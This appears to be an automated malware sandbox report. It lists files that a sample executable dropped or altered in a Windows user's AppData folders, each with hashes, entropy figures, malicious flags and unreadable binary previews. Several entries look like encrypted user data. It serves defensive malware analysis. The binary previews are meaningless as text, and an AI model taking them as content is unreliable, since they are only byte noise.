                                                                                                                                      Preview:%!Ado....O......|GJ........y...>.8...2v.z..?..{.g..kW.P.8.]_2`Y......%.6?3.../.A\.%.da..&...5...X........'.......e.&e...s...c..6j.D..'0.nq.R....Y..|{&..D.B....i..T&.e.sg...,....9.e.w...B...;.7...\..G...6.....x....c..C..Y..<....U.5t.T.JI!.".KNy1.O..N..4......?.c:.T..V.v<.`_.Q.R...$r.*._.k..l.l.[.4....[x .).M...I.M.6.u.. .I....C..g.Kk..SF....f.x.u.|....&X..B.,~..d...Q..q.QM.^..S.b.=^'.9x...}.....e.K..P...p..gB...1.x..0Xr.9.LV.[I..R\x.t.dS..?Cv.hK7Zs6y.......0...I..Xx,5..}.G....d.{.0. 9.8*9;.+[.z.......;..}.N+U~W...=t......a..\.<....5A.c..w.t...J...V....4.V..<w.-.....V@zt9R...b.r........C.TN.:..0d....|dV3.]d....o..3.....(..;......=M.e....!l...i&;H..Cy..p....gj7...o.."..u...$Gk`....(.N.,..n- .Q.m?..^.!A.i.2&......n.F...^s.]8.O.....BL....i.}D4....d...'7.....O..'ojb...4.../..I....p..W...+'Q1~S...V..kO:.t.q...s.......-M....$.tjR.II.`...`.uLR.p.F5..<..2.}$...z'U7i...1Yx.,25.`..%g]...<D;.Tqr.Qq....Z>....gM;S..K~=.p..n....n}U.d3...=^.e8...Q...pd

                                                                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):206549
                                                                                                                                      Entropy (8bit):7.250798585546882
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:xeEt4/c5LbL+LU4ygOxZNPDsm5iomRSRfQdn8FM81jwFzFHoWiRnB:xeEecJX+LzyXPDdHRfs2D1jOSnB
                                                                                                                                      MD5:6C69420836C8E802B056E64FB85501F5
                                                                                                                                      SHA1:589D5010C9837B0529E0ED52A09FE827AD32BA42
                                                                                                                                      SHA-256:9D6313EA3B73B812860A94C12627A3CFA06C4C20130ECF68E0A6B394228804D6
                                                                                                                                      SHA-512:C85DE2C8D9A3A164820E03E7400E6F481A6B3A673382A256D66DBB44D134E0CA1F0849F76B81F9534EB29DF23DE243AE191D7E15A5FB31A24EF21A228BB83E82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Adobe....].l6...J2w..v...2C..'...A...@#..<.r(y.......M<....T2&.F..(........T..Ho......|=r..yM6j..z.n...%.~...8......d.p..4.;o.Q.Y.t..v.cX..a..g'..Vs..54.'KA..f.>.G..4.{o.5....b9h5..QI.7<....?../..P........0d.*..365.:...2..e.#...O.A...D.'......}..|..m5.p...).....|..nl.E.....Q..i./...<*...z....!...q.c......g..(7{..+dq. .mf.99...q.[...@......A!..V.e.qTZ.L..A.4..-.j.9..u..0Wm.Zd9.r....%w.<S.1......./...a......o.2D_p...E..R..]v.........:,r..H..e...D."|.!.`3%.....(...o.I;..u.*ax.........p.+.t8..s.u...0g..Z:k|....`..r&.......Ce7*.|`a4:.6.A..K..../.].d.kGq......Z...."..[..E...z.w.F<...&4..L.5 .Mw...p.Vt.9..i_.J7..)...._........G.m.x.q .0..N..Z>.........Z..ej.n......x..."..W.~GE.e.6@......./....j..O^D.{A.q.<8..=eZO.&....F.0.pAd.9.M.'5.z2..E.e..L.9.....9..ogs.|......n.. $no..3.?Gn.o.l..#.....i.<.uu.......#..."...>Om?.p...<...HBE..{.h.h....~%.%Ra2.q.....2......~.D...E5..zS) .`.g@X.-...E....... .x.h.;|......s.>e.x.c.F...uQ...)5V..+...sD.......66....

                                                                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):67060
                                                                                                                                      Entropy (8bit):7.99704831469149
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:BqS3rxWgQqlogm39Qmpg6UIGRtArH4ODdnLP:dTQRmWg6UxtHOD9
                                                                                                                                      MD5:5689D610D4DD097422ED691C4FF57740
                                                                                                                                      SHA1:C556E8D605E76FE2DF5FD4DE77204A810EF21502
                                                                                                                                      SHA-256:ABF03DE2E292228B65A5E596FA54F38C4C5731A7FAD1C0A545B608D51EA81796
                                                                                                                                      SHA-512:784A8743FF7CA640E581313B5734E9133C74C2B92DFA67819D6F54C359F0EF87EC53FD4A9B2483F1CEF7675E18DE4C1361770D643F62A52624C94EDF9C00FC4F
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:4.397u.4..6/.y|.@-.uTkn.?2W..>.@IC...5KJ-s..]...'.7...Z..BjGO|..s.T.......'d........NB.b.GX.}..R=..X..:J&....F.J....u......3%.....u..~T.@.[.3.P.m...lAe. .....w....E....0.-..c.4.|(..w..!...R..#......u....M.8.......p,T.X. t....7.RW*WoS....V%...^g9...5..F8Y.4W+`..V%.h.u....DF.>V.&...u..m..G&.{hq..5rg/.[}..M.....^.._j.M..4}...z.]5(...8U.4...~.2E...........OL.w.f...NX.....-...WlZ.]..6....Zg07..../.....'..w1Y...1..e.l....Ywr..*.W.z...eR.TJ.....]..Z}......k..F...Z.~^\.......+,..9...u..H...[.......!lN....NFG....}...x.6.....M..P...rp..zfOE.:.`{]./.....j.KR....Zn4iV;,l....5..."Lf.r..H2.WsY.n#....u.L..Z...W.....G.._.Q.hIX.'...^.\.....,...|8.srZ.f...n.O...s.c..x1..nu.u*k...M3...n..g..P.]...J.....'..L...Yp.?,...a..M?V<.....'sp....>.X[.`i*AB9.K'......\.>..N.8.R..1......]/.XG..p.T..3..[.Q=S...+....._..A.q/d..(...$.4.y..i/..Bn.&t.x.A.g..e...1..GU..)*hs.}b.....S.\=b..8.0.....^...kM|[[B.q.i,o.6...1.C.a..z..'oJ..U.],.d...'.g.pa..d,*3\U....<.!..,.6...5@

                                                                                                                                      C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):932
                                                                                                                                      Entropy (8bit):7.761273053266735
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:mgWc3f11zl4dK7MdMo4gqJ5wuCJoXe9ydVcz5rH97jHV9RoH7kUvE/luAtukIciD:mUh4d8N1Jz2Bdf19RoHgUvVAqbD
                                                                                                                                      MD5:57CE29E4A8C910A0A5FAF38F0328F69E
                                                                                                                                      SHA1:C872AA3071987F0D3CC594D2CFC337B08D0D3D48
                                                                                                                                      SHA-256:254D0E8A32AB2F375856A080DE0C4725CDD656E024C8C18ACAA318CCB2791A32
                                                                                                                                      SHA-512:22777FE7B44290063DD7BD16E1709B1A08BBC44B8AC5387142AFAD66ADA8DF95E2DE7315F0974BF84F9452BED562498DF8DCFBE428D317147572FAA84681B22F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CPSA....].Z...=9..l...Z.v.C]..h.y..H..9...... ..Qm.+X+.R...n.g.%.Rl.TZU.sgL>..k...Re..$Z`.l......Y....A..w....2..'...uf.-.k.+.....N.?b.;...Z.;....r..8b.......^i.U.x..r.....[.....>r.8...n..rC....o..4}i.[c....uP.t......1....Q..n....!...`.\.5h..D..Ya..hJ..B..S{..D..Z.`EE.._....&.Zy.L...?...;./.g.?$...AH...Q....-M63L.%.#.ywC.ux.......!..p.<Y.......>....v...<.}un.'R....x'R....1-P[..#w2O.......#..K....W.O.[...GSL..XOE.YO{fih@......+.%.9Q.B.S..e....e.#.*....n)K..7.{p.Q.\H..i...:`.V.fx...f.\..<j..../...I.]/..d<...,`.~2...I...P..F~.Rg..^..q..7{.X.. .....9..'..Er>..Y.0.@b1I..y.'9.. .u..)...U..t... .wr..g.....{..=...?.2w..-,...MP..jt...SNR..c..E....04..L..\)..f..5...N..F.0F.,.T2..(.gS.,7.S.65Zp".I.sl@....C[...cL.jL..........u.....@.qe.L%m.1..R.Lx.....|D.........E._4./..3s./)...fX.>[..iL.<...^...&..X...ty*\\.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.976245177598905
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:1svx29eYe+av6TGL/2fk13mz3QsPx589yvItTvPlc2666qP:1s5pYe+av6T6eA2zgF2Itztc2/
                                                                                                                                      MD5:BDB824342BA08D3CCBCB6ADF715953B0
                                                                                                                                      SHA1:623C8BE42EB7FB62C36BD1E24CD16786C7200783
                                                                                                                                      SHA-256:D9E12397A3118D7D4EF7AB4CACA4741195B1F44E9108BD89CEABBB2DC11E1C41
                                                                                                                                      SHA-512:7529B96716F49CC9DB2309E826798E1743575A050C4DF5537051847ED3881014C43135418637143E8DE9FAAF90FE02E9D0FA58B3B24BDC79A07B84852C308F6B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..$a...e@.t.x.8.....g.a.d........O|.K.g.e.....^.....m..*7....Gv...G%1@W'.........g..#..2'i.V......F.'=..\.B.K......l..).X..&.c0..*..kU<Vx?.R.WY.....EIw..h...x..!.c..G.x.Nd~x.\Q?..:X..( {.lK...~J...3....r.....( .........{...~.x....G.xXvb>..?.#R..R.....A...a... +q...*>S?.I....i........LLcN21)?.E.5.dJ9<..v..........T..2....K^..b.,.$.\6.3.i.....tNe%....f]#..&'4R..F......G..........8..DJ.......$u.J.be..F4......W`P.Uq.....O#kw.....E...J...1:....A.....2..Z.o.+../..*;y.c.....S..P...W(.^..'.d.~.#..?.r...y|.@k!^."Y..]e..:....)Z.'....H.%_/DI.........qwE....M``i.N...T.U......QxU.wzrV.H..n..n8.W.{..."..y....5o..r.......5.....W..KVTw.(..rG.#..QqZ...K...X..x..K....G.Z.u...K(C..B.}3~.[.6...i..t..aG.N6.)..h......^`.h<R.+\..2.8...+$.l.|>.gqbl....Zj..5.t.....JF'.<gD.|(.T-..pY...CR.%...X.BTN...LJ..R..V......Q\+.z......Kb=....a.2..Do..K......D....?|t`-.|.W7..}L....j.R.\~@..0m.A.+r..=0..5a....]+2i...{C.L..D......-.h..Fhd&........@@:...^EO.)...z..z...g k..L..

                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3146062
                                                                                                                                      Entropy (8bit):1.730808438843662
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:E+GNXxcK414IX/WpAGMzUdUMg3Wg+bq4JyRROYBVftDFVZU5J3qh+AJ3TGXZAcbw:cBNGX+pAGE/ohuBy+
                                                                                                                                      MD5:FF0D3249F54DF0F69C4A666F090964F1
                                                                                                                                      SHA1:BD44A4ED6CE58698E705EC53DA8709BAA2D8C55F
                                                                                                                                      SHA-256:1EF830674A2242E2BA17BDEFE3BCEC26B0157C76088994016E5D70682CBBB16D
                                                                                                                                      SHA-512:08793195C888317CE6C27C1590CC545DB458FB09EF93CD010C68D874B2E24D481EE2DA893B0188A636263ED9BBE93BA862DAF462F3D5864FF7EDBBAF477BAB01
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:6G.r.U..(..h.~Bz....B..C.J.$#u*......h.L..5gt.....5.z]#fX.w3n\...i!.............-f.(..p.5.~..}....5.!>.)A(..d.I.d..*y...RT.r....-."]+.<.../Z]..C..'......z.@X?.M...k`.y7:..Z..iQ`w/.n.t..B>y....Q..LA>...b..}R@+/2.:..!..OX....kRc.. ..7.h..*.y..C&....$.tAX.^s.M,.....t.P..I.t.....DW.Mk....L{3J\lI.....!.>.E....<.._a....40.v...1.J.)[.!@.W....4..\...........(a..Sz.+kXh..Un.....0Lo.8.....q...pu..=....wU...E.....T......!U?.K&k.{,'....Qe...j.P...T.O.i..t.a.OG.......'..#3..k|.....Qa(."(w`%'=..H......s...... ..z..8Kj.-lw.g...x.!..%...:..[.......]>..a....xz..d...#.\.>n.d...8I.l..U.e.......F..q......$...X...."V...[.Q..@...}..OO...?.@Y..H2y....pb...X.I)...e...Y.|...%...:.S.)...N...K2V)c....>...z#.Q.6.=. 5o..;....eNF....c..F.W.N.7r..W.D........E..<...\.%.c.O.f....k.k.C..H.Q.{e=%....n...Ug.<..D.)D..0'.;@.N.....$..pJ..2...9X.6.....B.2...HbS.. ...u.U.4ly.|..F...4q.P'fh.........e.a...1.K...-`....... .\...p....y..q7..o.;..B.'.[..m.8z.....`:N?......W..U#s..W.w.l

                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3146062
                                                                                                                                      Entropy (8bit):0.6707572477174776
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:6JGWGizLiy22m9xh1MubYqYjxnm6fXV63OoKEKAK1+PwqFOT3DUoN3b:6JGdiz2Zz1MubYFxnpnoE+PwqET3D71
                                                                                                                                      MD5:8A7EA00FADBA58159BA9AF4A46D94A96
                                                                                                                                      SHA1:9B8991B8E871A808021E64BC2D11865B84958140
                                                                                                                                      SHA-256:AABAD3F336EBA3D1CD776E1504D41102369C02F42758EB023CE4289A71452315
                                                                                                                                      SHA-512:7260A30F465CAF05CC89930416425E4A8CEE279C1F57961AE7CF3FE624CD7437B13C80913F538F3040C79E86968303CF53DAA3680382B869966872C4C2679466
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......W..."V.....{l.5b..d...{.($<...)..Bh=.d".E#....{.z..(ba[...j9...dX.*A.?,Dj/...#x.1b.Q...enI.?..F..e)......VB.\.O.w>..[............k.sy.....zC../..4...2^8..<....^q .....g.0.oz..^F.I.q.Qib^.$.K...... .........rV..>...._.....?HE.3.@....>...2(I.."\V.lM.4T.....%uc.n\..*6.A..._}~d.j!.......=..9.V/..>.RN&.HY..!.A..8S....X.^{..7...C!..^.........vS..g)..Yf-.[...Q[..._.@8....a...j...k....3.Z..'.{7.3...Sf..v....."..%U...v.H......,.C.%.J...1+..L......I{..I....,.V...&E.q.L....#.e....6......2k{..C....E.x.pqd.)..G.L....I.f...ce..(...mY.N..].g.......pj.../6W{RM....h..~..5.....5.vZ.T.[.l..Y.D..3..A..a.G...P.8..A....0Z.g0.}mk.!{])...(.=&.t....T.1...]%..TY..} ..e..*R0.............F.L..}`.aS.3...".c........;.S.i..5.rz..C.A.w..L..m...$..MtjF..P..=....:$.wv:... ..../...<..+$.B..p..}5...=8....b...}..>5.z.....8f...X.D..Y...x.].g.a.]...7.d.....'.9....?..F......>..&.>.+......"$/...._.8$.g..........O..H.40S.|e>.R...D.+....7..5{.:sp<..).B+.3..e.Q.,..

                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3146062
                                                                                                                                      Entropy (8bit):0.6707617718627839
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:YETbOSkQANR0fh/fJYVFgE7VGOrtzTyhVEyLflbVRrhw9jA6Oy2tt0o2:Y28QvfRJYVFgmjJnaE4tbxwtAEIqb
                                                                                                                                      MD5:E06158FB6BB7E9D3A92E15F100DE777E
                                                                                                                                      SHA1:E7C36F269CFB770968D2644366D86F8C8E3BA506
                                                                                                                                      SHA-256:DB4944647934C0C33B3FA251B8A85C784D70C03A5A1FCEA080EFFBFB866020F0
                                                                                                                                      SHA-512:7C53188EFB8FC6BA8E1183299C08DC060A6AA676B12A55ABF401027ABE1EDE9FB821F98925390760538E0C6A79ADBE6193D8BE9A82B48CBB10BACBA9E9B3F5E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.....W<Y......@.Qd...#.....g.,....5.R*.F.hI..L....M...'.>.@.t...\K.9.Q.9..q.@.c......cM.1dh5.4..).DX..\.BZ.,T.9.....z{.......j.=.....IL..]........N.l....e.TG.0.3...%.....4..?..u.n]....@Vq...#.N+.......C.R.0...f@o..\..\uq.^...&z]IP.V...D.....x]^............Y..$...~U..Tz.3........0z.........;9..J.w}g%D...\jE.U[.2.VEXt....N..a.-.O..o.....F..]...ja.kj..E....V.....W.r.P.G....u..X.c....w.D...h.>xj....~.........S..__..W.K....Axg..O6.*g_.j.Y...+..c]..H.*.]....VK.Q!...:...G....4R..1J].....8.L...:|..R.3.]4I*.b/...9n...R...C.\.X.56...#0..t.tg.H]w..};....`..9~i...aD.%..c.C.......=.kP.:.......F...qK...81....p,A.&..Cn.X.S].....m^, (wxh..X-^o}G.H..^..9Nd.....t...9.~.j..s..I...:....z#)..?.R.$.F.J.... ....7..i\yl..C.]..~...xVW.e}.&8._o...{^........D._...#..x.V(~ '.V..L..W.......U.!O'B.1....&.*..8Yj~.. y>.=....!4t....eu..#..W.M..D...y.gP,...0 2~....3..k.......4.....T...E.&..t.#p...".g.Kn.n4.CX"d.v......I.g....q?..A.............9\..R.....b..n...%.j.

                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3146062
                                                                                                                                      Entropy (8bit):0.6706687989767469
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:2WiAXLd0VSxlYh2wn84Pr4JSHsO2pF2znqFv35OfviCo/Xao:DiAXZ0VQ4jJsO0F2+Oq/Ko
                                                                                                                                      MD5:8C548C9BAA222E4AE0E34084C3D57F22
                                                                                                                                      SHA1:0FB35EB7A26FFF17DA9E836648E4628F0E72D233
                                                                                                                                      SHA-256:32934A475758E575B446210A6A54C3D9BEFCF5411F660F112B25787D14775309
                                                                                                                                      SHA-512:6994B9E1A1F4E57DE2D07B667138895B222FBD063EEBC5EDA314E59B223C26B32CE4783F84B5052283EFE7F9E2E4700E1F456545F306DBBE6AE5FA94D5328EAC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......K....~,..E...-...a;.c.....:b.65;.6.}....OYMK#..*......<..A.y...!...0.ID>.k.V.8...8..E.'0b...;9.-c,:......)... .{..e(OA*.@s.Dv] .....{.E.@..0.?d....].......T.o..@'pj.B......uH..h[..waK.bPb:.q.ROi...*...A1..........#..4...r..t...o..3.=C.W.@....T_....Y...T0..m....Z0.a.~_."..v......{..]<...P.}.R"...(....z.T..Bp..\..L.....kb........<...P7..k.<.......|.Gs.{..u..^....12..G.kUH.(J..../`.(.5....t...#<j....?...6p.l.g..H..8U..T'...v...84....H.M`M...;.3s.B.0..(. ..D..\...=.Qp`v...}.../.'.l.......M.T03......*"ZG#,.l.#..`.9.....#.8..]D.q+'....2r.. .:`_9..........`._.2..H...R...6.4...'..O.25I.Y../'?..&..._...S^.u..x.EJ.X<g.W.......{Z. M+y.G...*!...p.<.2$.{k.t...5..$...l .q.w%...G.`B...*..E.|..c....Y..R.+.P..D.o1{.....,..k3E..."KM.`R..9.....Z_f..a..x......,v..n..].jy.6..:..*.[.^n-K...%k.......g..~j.x.".)...v7.9$@..E.5.v.3..)....b.S..z.t....Y``W.....P.{..&..Yk..#8.........N.bQ....|.UN.v.T.0...B....IeSg.1...'...._=)^.)-...|].~_...{.h.&..RQ..q.

                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16718
                                                                                                                                      Entropy (8bit):7.9890627275317305
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:TOeA6OLWZwTdZYHjEusYnY+eBKkK7HVZH8+743OtiFtKTf:TOeA6Vu0jzsqv7jH8+743OcFyf
                                                                                                                                      MD5:CDF25DA7A1B9111FBA65E9ED10B3172C
                                                                                                                                      SHA1:D5CC59F011588BA9816AD26475359A6C44F886C7
                                                                                                                                      SHA-256:358C66CCE9231AD1B4A40A7DE0FE484AA2C64EAF71BC582E8F72E6F26D8D7DBA
                                                                                                                                      SHA-512:8326E8C0D9BEBF0035360362D0899505DDADB9976A019BEC8E0A628361B5F8D0309C60EFC86A18162AF936153C03E168201B42E79CAEC0002D8F627C2AA36A9D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:e.X...s#.........>.`fr.Z.......'.u.,&z_.*..`X.....K............&..~.|..z.5..>..&.Q.ea..`.x..%9....0..s...L..jk...e.|..Y..@...o.:.........-...|g.....)....+..../.4#..%...]j..9@.x..Vdp.Q.=...+K.`......R .=...n....qS.6.....b.._....V..j^:.8.O......../.....B0.Hx.......usK#....,....4O .M.W..M.... q...'j..L..'W..;.X[.......Sfm<.....m..s:|...AOcl.LM&T..@...b....8.Aw.Ca.+....s....U..U.7.Us|L...W.x._>.4w.J..$.s....YS.g../.K..-..L.Y.r.m2R\.m....).C.O......|..M.2...(6..'......./..z.t..e.5..4Xc"........5WWa.Ca.........'..*..=.......=#7.Qb....;..L....=.3Q.^.~J.............D..=MHz.].,.Z..+.........NC%..s.$#.1...%..}.:.+.......~e...........!.,...U\.....&./..v_J.zr..8......zzf...b..S9q..%..........f{.P.]......j.....o.*H}..F..F.".n..e.].#..E...H....+....2.nO.Wh.V._.E.......:........I6D..{a...... .J}.2.d9....^&..'(....V.\.5.&.....".0..)e'.....`P5[.*.#....1.6%.w.T4L.......!...d...$Wn..K.;(....*mc...<.d{....U..._w.|i.8f....?.x~L.C.FP...6!..$S.......]!T

                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6291790
                                                                                                                                      Entropy (8bit):0.44060106936652915
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:9d/uf3g1A6hKTJbWMx4STbKYxumrfDZMykWUnaCfYD:fufw1/KZGYLVMtF2
                                                                                                                                      MD5:5AB89E1E122454B32FBC6300A571E429
                                                                                                                                      SHA1:8F3B260A18864CF1A41A6C65236D91E20F137A62
                                                                                                                                      SHA-256:F5C568D6ADCBC1623A990916EDEAFB555CBDE49D863FD438BF5ACDF3B14A549E
                                                                                                                                      SHA-512:AF4F6EF904B0E59EB7EDC50177AB7D28885AE11A1EB70F624D8E68C0D17C219431E836EC6DFC23FD79EC564B1ED114AB70097E8AC3769DB08C27DA10F828FF2E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:?E...l'.M.!....b..jQ..qd....QA..cX.-;.".nt..RGD..S|.X~...6^...T.G..O.D.m..)x.w.z...,7.L....LI7[.........g!....Z..M.p96.?.Q.W.r.5.cF...h.....e.O..[}..../..phK..3(.....I..\..w..}.O.Rf....-....8....s......<...0.KT.p.l.1a+ .q...-...V.B.5}F?.ya.....(-_....9....;'{.\.s@.h...;....q^....}+.-..suY.7j..x......}.9......)..S*&.J..t...6...j...*........&3I .:.ua..m..>.M...8l6.....\.O:.D.X.E..>rQ..>.nM...r.[dc.)Z.Mz.lO^..q.......^.]....;..\O......H..s.hf<...;..&yZ....xH.T..e.v..U.....\oCf...-.\...HB..ANP..kG.:.%y8n..?\..X.3...+|...s .G...U.S/..S_Q.e..L8wX....]...My. ...T....*./.6..0$.....si.OEr...mYG.2.w5)\...e......=,..IDLYI..u=J7+k...F..;`z.....3]......z..rN.-..(]...;.B.a.K^#.._C.(....2.m...[GYa.Z@.$..[.(.L.Rq87..#.. FOUy.v...I5..zo..... 1B_m{...Y.BP.P,....l........._6B.k.d...GL..."........(...P..Tu....soN.>T..]\..E....].....L.%.C.(.SW.C...x[.i.21..MX.....}.QF..*..9.@....Z..S.8fr.K..f..?...%c...+.B...b?...-....Q..J..t!cj..f........@f..c.<.sa..G...s

                                                                                                                                      C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5200
                                                                                                                                      Entropy (8bit):7.957401659329865
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:O5V2uBqAp0SxbnQtkCjVc0ig94xpGO+FRrH9zGF36P+qCt00rHkQ3Y9m:O5VlZp0Stnj0igmxpGO+fHJwq3h0r5Am
                                                                                                                                      MD5:4B124D772FB4683B940BDF03BAF50E89
                                                                                                                                      SHA1:02C2F1CE17B838FE49ECC91A0F9232312240D774
                                                                                                                                      SHA-256:4EAF4E40BEB142FF7E7424ED731962BC4640B32CC53118252DD7D222BB302124
                                                                                                                                      SHA-512:0B9FAB76EA19CDB8B4DBBA0DBD6A54C693F157B323E5C873C10B3A611FE4CFC19C4221447ACC0802302C9F992BDE2B44CE672D514D2036E57F963AC0D9305A38
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.{..&......}.z..'...*..M....GHW.s..h.:".z..&<...I.Z.dUOW.I_.o....../..4R......n..L(.....5.+.<.J:.?.....>X..9..G1.8._R6....-u. ..T.*.....Q.k.A7F.. ..0{.1....j.....dc.D......@]m...y. /......4.$r....Ri\.J.a..Q...Z#U....&.....q...:../..h6./.r..G....)......dDK...\.R.#......s...#.(..;y..|iEW$.t.j. ..P-....b...~.CJ......].....].I8.rs........D......kp.&.F..|..n...T..j0|..g..9P...q.....KQ(.0L`.......&..uF]!.7QD.,....-w:..eC1g..|V.w.[...n.).W.. .......:..%=......m.c.H.7...`.|..A1L.O..e.-/.#.wP..)[_.......m._v/.....8..R.V....B...)X='..:.#..zx.F...5..Z.!.g)..a.;.2......q.q.M..,....]....B... ...R.57!..v1....Ifv.`..^..T).?..'.*....>..t.es.V`..d;. .-..'..B...$..f...<%Mf.h.....G.9..]..@..w.._..%...;o.a...A.<z..c.%....].^...Hy...%..2....A.?b..]...g[.,.WS.V....E..!..lG..x.p[.......v.Th...z...7.Y.oHBO.N_..=.=8..m|...k.=g."f.a(.u.u...j.#.".k....q.H..t.[.......U..0...Fs...TF.6.x..HK.X"..Jk.!.wX..<...ZxC.g.....EO.|I..V...fW..%....}?.E....R.S......v$

                                                                                                                                      C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):65886
                                                                                                                                      Entropy (8bit):7.997419199727783
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:Zo73DOr5JxoArCe4dHJy/yFFGp48nR15k0YJdAhwQF:ZoiNrCeac/yFuH5k0twY
                                                                                                                                      MD5:C0AFDC62754716237BEE57166DC3FF08
                                                                                                                                      SHA1:042B8F96442132EA3B6FF3A48C525FE1BA677421
                                                                                                                                      SHA-256:18FC39C7ADD9C4C25C855D4C0909B0D3A236E0C41F36C8B1401BA28E389B2493
                                                                                                                                      SHA-512:C3F597AB5055A6F3DA3D1B0E8D1CF07246967AE290ADEF236A6A6D401A8290124B44FBFE8775D62C96AD8AA19464F8DBB0CED56F94CA2DE96D0CD07047E2EBAC
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:...S.../..N.Q!aZq..H...26......m........rW..0f.S.....Z....U....a.i.^B.J...,..c.}.@.W.7$.jf.(. 9s....y..(.K.u.B.=l.....$.].....N......)N!B.B..F...a...,?......z..w.0.u%x..../".d?,Q..4./f.%X.. /q.C..57.).|..R..2.j.t3....&.x.....B.......Ps.z.V....2..P....R..9F...Z.Y.8-.g...g.\2u(.....wN..'@+lTak..K..mI.H.d......5.i....M.......&...?..l..PW0...1.>up.%/..O.\qr.-A..h...3cM?..1..<.<.F+..o..J:.x.]$9..h.4.t .....I...T.p..#......h.qh$..=.'.v"C.k.... ......|.Y....5..Q.\..Uz~u..T-........*H!'.t...N.A..]..\8..MeF.7.s..,.&..&4..3.@..a.:H...<"=.%b. .Z.VM..f:..O.^t..9...\.....1...\n...g.........&uz.5.D....)...?.{.....6.>S..J8...Dz...K.[].;.lx.#...`...w..........n.2..^8....t.Z.I.$.J....p...w1Q...g..m.=o.H....;...|.".N....f..:......%E./...X1D..v.vF...<Rj..Mr..s...t...t...d~(..E..N...DO.;_ .gM.3..U..A..=:..:...v.T{...o.....a.....&...5.XG.....I..=.;9......g5.P..AS...C.<.+......~.KV*....8...Q.X.2-w..S.!..i...B..m.4r.b..pT ......E.#..0..;`...n8s.E.....(..\z.

